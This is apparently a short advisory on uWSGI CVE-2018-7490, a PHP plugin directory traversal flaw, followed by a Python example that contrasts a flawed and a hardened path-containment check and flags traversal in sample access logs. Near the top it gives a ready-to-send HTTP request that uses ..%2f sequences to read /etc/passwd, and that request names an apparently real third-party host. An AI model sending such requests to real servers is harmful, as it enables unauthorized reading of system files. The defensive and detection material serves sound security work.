uWSGI CVE-2018-7490: PHP plugin directory traversal vulnerability


In uWSGI versions before 2.0.17, the PHP plugin does not handle the DOCUMENT_ROOT check correctly, so a user can traverse directories with ..%2f and read or execute files outside DOCUMENT_ROOT.

GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
Host: downgame.shuowan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
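As an added example (not code from the original post or from the uWSGI project), the script below contrasts a containment check performed on the still-encoded path, which lets ..%2f through, with one that decodes the path first and compares it component-wise against the document root; it also flags such requests in constructed access-log lines. The document root, the probe path and the log lines are assumptions for the demonstration.

```python
import os
import re
from urllib.parse import unquote

# Assumed document root for this example (not a value from the post).
DOCUMENT_ROOT = "/var/www/html"

def naive_in_root(doc_root: str, path: str) -> bool:
    # Flawed containment check: the still-encoded path is joined and
    # only a string-prefix comparison is made. "..%2f" is one opaque
    # component here, so normpath never sees it as "..".
    candidate = os.path.normpath(doc_root + path)
    return candidate.startswith(doc_root)

def hardened_in_root(doc_root: str, path: str) -> bool:
    # Decode once so %2f becomes "/", resolve the result against the
    # root, and require it to be the root or a child of it (the
    # trailing separator stops "/var/www/html-other" from matching).
    root = os.path.abspath(doc_root)
    decoded = unquote(path).split("?", 1)[0]
    candidate = os.path.abspath(os.path.join(root, decoded.lstrip("/")))
    return candidate == root or candidate.startswith(root + os.sep)

# Constructed access-log lines (not from the original post) for detection.
ACCESS_LOG = [
    '203.0.113.5 - - [01/Mar/2018:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Mar/2018:10:00:01 +0000] "GET /..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1431',
    '203.0.113.7 - - [01/Mar/2018:10:00:02 +0000] "GET /docs/../index.php HTTP/1.1" 200 512',
]
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/')

def traversal_requests(log_lines):
    # Flag requests whose decoded path contains a ".." component,
    # regardless of whether the dots arrived as "../" or "..%2f".
    flagged = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        components = unquote(m.group(1)).split("?", 1)[0].split("/")
        if ".." in components:
            flagged.append(line)
    return flagged

if __name__ == "__main__":
    probe = "/..%2f..%2f..%2fetc/passwd"
    print("naive check accepts:", naive_in_root(DOCUMENT_ROOT, probe))        # True
    print("hardened check accepts:", hardened_in_root(DOCUMENT_ROOT, probe))  # False
    for hit in traversal_requests(ACCESS_LOG):
        print("traversal attempt:", hit)
```

The hardened check decodes exactly once, so it must run on the path in the same form the server will eventually open; if a proxy in front decodes as well, check the path after that decoding.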
